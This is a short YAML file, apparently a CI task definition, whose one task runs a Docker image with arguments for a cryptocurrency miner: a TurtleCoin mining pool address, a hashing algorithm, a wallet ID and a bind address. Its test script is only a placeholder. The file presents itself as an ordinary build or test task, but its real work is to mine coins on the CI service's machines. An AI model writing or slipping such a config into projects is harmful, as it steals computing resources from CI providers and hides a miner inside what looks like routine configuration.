efficient_task:
  container:
    dockerfile: christiankm01/master:latest
    docker_arguments:
      foo: turtle  --bind=54.39.234.99:3129 --algorithm argon2id_chukwa2 --pool ca.turtlecoin.herominers.com:10380 --wallet TRTLv1eACSpKx6fbiG4PAiQj2xtiwxhHQ9vYZhhf84USCaabq8JSyoNX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhKQKoJF.p5 --disable-gpu
  test_script: ...
